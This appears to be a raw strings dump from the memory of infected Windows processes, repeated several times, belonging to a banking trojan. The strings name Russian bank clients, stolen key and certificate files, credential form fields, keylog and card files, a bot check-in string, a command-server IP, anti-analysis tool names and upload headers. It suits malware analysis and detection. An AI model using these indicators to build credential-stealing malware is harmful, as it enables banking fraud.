Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

conhost.exe_2168_rwx_014D0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_2560_rwx_005F0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_2560_rwx_00650000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

LOCALSERVICE!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

conhost.exe_3500_rwx_00370000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

